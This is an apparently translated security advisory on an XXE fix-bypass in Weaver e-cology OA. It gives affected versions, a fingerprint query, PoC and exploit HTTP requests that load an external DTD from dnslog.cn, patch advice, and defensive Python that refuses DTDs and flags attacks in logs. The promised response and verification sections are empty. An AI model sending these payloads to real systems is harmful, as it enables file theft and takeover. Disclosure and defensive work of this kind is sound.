0x01 Product Introduction
Weaver (Fanwei) E-cology is a large-scale enterprise collaborative management platform that integrates an enterprise information portal, knowledge and document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management, and a data center.
0x02 Vulnerability Overview
A function point of Fanwei e-cology did not adequately filter user input, so XXE could be triggered when the input was processed as XML. The filtering rules added by the subsequent fix can still be bypassed; this vulnerability is a bypass of that earlier fix. An attacker who exploits it can list directories, read files, and even obtain administrator privileges on the application system.
0x03 Scope of Influence
Fanwei EC 9.x with security patch version < 10.58.2
Fanwei EC 8.x with security patch version < 10.58.2
0x04 Reproduction Environment
Intergraph fingerprint: app.name="Fanwei e-cology 9.0 OA"
0x05 Vulnerability Reproduction
PoC
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
<M><syscode>&send;</syscode></M>
If the response above is returned, the vulnerability is present.
exp1
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>
exp2
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: your-ip
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>
PS: exp2 differs from exp1 only in the vulnerable request path.
Verification:
0x06 Remediation Suggestions
Interim mitigation
Restrict the source addresses allowed to reach the system, and do not expose it to the Internet unless necessary.
Upgrade fix
The vendor has officially released security patch 10.58.2, which fixes this vulnerability. Affected users are advised to update to 10.58.2:
https://www.weaver.com.cn/cs/securityDownload.html#
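The overview above notes that the first fix relied on filtering rules that were later bypassed. The robust fix for XXE is to refuse DTDs (DOCTYPE and ENTITY declarations) before the XML ever reaches the parser, rather than pattern-matching one known payload. The following Python is an added example written for this write-up; it is not Weaver's code and does not describe how patch 10.58.2 works. It assumes the request body arrives as raw bytes and shows two defender-side pieces: a parser guard for the <M><syscode> body shape used by the PoC, and a detection pass over constructed request records for the two affected paths. The endpoint names are the ones on this page; the log records and URLs in them are constructed sample data.

```python
"""Added example (not Weaver's code): DTD refusal and detection for the
e-cology XXE endpoints discussed above."""
import re
import xml.etree.ElementTree as ET

# Paths named in the PoC/exp requests on this page.
AFFECTED_PATHS = {
    "/rest/ofs/ReceiveCCRequestByXml",
    "/rest/ofs/deleteUserRequestInfoByXml",
}

# Any DTD declaration is refused. Matching is case-insensitive on purpose:
# a filter that only matches the literal "<!DOCTYPE" is the kind of rule
# that gets bypassed.
_DTD_RE = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def normalise_body(raw: bytes) -> bytes:
    """Return the body as BOM-free UTF-8 so a UTF-16 body cannot hide a DTD
    from a byte-level check. Bodies without a BOM and without UTF-16 NUL
    interleaving are passed through unchanged."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16").encode("utf-8")  # BOM consumed by codec
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw.decode("utf-8-sig").encode("utf-8")
    if raw[:2] == b"<\x00":  # UTF-16-LE without BOM
        return raw.decode("utf-16-le").encode("utf-8")
    if raw[:2] == b"\x00<":  # UTF-16-BE without BOM
        return raw.decode("utf-16-be").encode("utf-8")
    return raw


def contains_dtd(raw: bytes) -> bool:
    """True if the (normalised) body carries a DOCTYPE or ENTITY declaration."""
    return _DTD_RE.search(normalise_body(raw)) is not None


class DtdNotAllowed(ValueError):
    """Raised when a request body carries a DTD."""


def parse_syscode(raw: bytes) -> str:
    """Parse a <M><syscode>...</syscode></M> body with DTDs refused up front.
    Undefined entity references such as &send; fail inside ET as a ParseError,
    so nothing external is ever fetched."""
    if contains_dtd(raw):
        raise DtdNotAllowed("DTD declarations are not accepted on this endpoint")
    root = ET.fromstring(normalise_body(raw))
    node = root.find("syscode")
    if root.tag != "M" or node is None:
        raise ValueError("expected <M><syscode>...</syscode></M>")
    return (node.text or "").strip()


# Constructed request records (hypothetical log format): the second and third
# carry a DTD, the third in UTF-16 to show why the body is normalised first.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/rest/ofs/ReceiveCCRequestByXml",
     "body": b"<M><syscode>ABC123</syscode></M>"},
    {"method": "POST", "path": "/rest/ofs/deleteUserRequestInfoByXml",
     "body": b'<?xml version="1.0"?><!DOCTYPE syscode SYSTEM '
             b'"http://dtd.example.invalid/x"><M><syscode>&send;</syscode></M>'},
    {"method": "POST", "path": "/rest/ofs/ReceiveCCRequestByXml",
     "body": '<!DOCTYPE syscode SYSTEM "http://dtd.example.invalid/y">'
             '<M><syscode>&send;</syscode></M>'.encode("utf-16")},
    {"method": "GET", "path": "/rest/ofs/ReceiveCCRequestByXml", "body": b""},
    {"method": "POST", "path": "/login/Login.jsp",
     "body": b'<!DOCTYPE html><html></html>'},  # not an affected endpoint
]


def flag_xxe_attempts(records):
    """Indices of records that are POSTs to an affected path with a DTD in the body."""
    return [
        i for i, rec in enumerate(records)
        if rec["method"] == "POST"
        and rec["path"] in AFFECTED_PATHS
        and contains_dtd(rec["body"])
    ]


if __name__ == "__main__":
    print("benign syscode:", parse_syscode(SAMPLE_REQUESTS[0]["body"]))
    print("flagged records:", flag_xxe_attempts(SAMPLE_REQUESTS))
```

The guard refuses the body before parsing instead of trying to recognise specific payloads, which is why it also catches the UTF-16 record; the detection function is deliberately scoped to the two paths on this page so it can be dropped into a log review of an exposed instance without flagging ordinary HTML form posts.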